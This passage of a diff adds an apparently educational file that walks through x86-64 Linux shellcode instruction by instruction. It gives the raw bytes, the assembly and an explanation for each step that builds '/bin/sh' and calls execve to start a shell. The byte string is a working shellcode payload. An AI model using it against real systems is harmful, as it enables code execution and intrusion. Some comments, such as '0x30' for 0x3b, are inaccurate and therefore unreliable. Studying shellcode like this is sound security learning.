--- /dev/null
+a, b).
+\x48\x31\xd2 xor %rdx, %rdx
+Put in %rdx the value of %rdx xor'ed with %rdx. This basically means 0.
+\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 mov $0x68732f6e69622f2f, %rbx
+Put "/bin/sh" in the %rbx register.
+\x48\xc1\xeb\x08 shr $0x8, %rbx
+Bitshift the %rbx register 8 places to the right
+\x53 push %rbx
+Put the %rbx register on the stack
+\x48\x89\xe7 mov %rsp, %rdi
+Put the top item on the stack(%rbx, "/bin/sh") in %rdi
+\x52 push %rdx
+Push %rdx on the stack(which was 0)
+\x57 push %rdi
+Push %rdi on the stack(which was %rbx, which was "/bin/sh")
+\x48\x89\xe6 mov %rsp, %rsi
+Put the top item from the stack in %rsi("/bin/sh")
+\xb0\x3b mov $0x3b, %al
+Put 0x30 in %al which is the short %rax, return value.
+\x0f\x05 syscall
+This does a sys_execve call. in the following format
+ sys_execve(%rdi, %rsi %rdx)
+ sys_execve(file, argv, envp)
+ sys_execve("/bin/sh", "/bin/sh", NULL);
+The shellcode will start up a shell.
+The string containing the shell code is not padded with zeros. Zero bytes
+must not occur in shell code.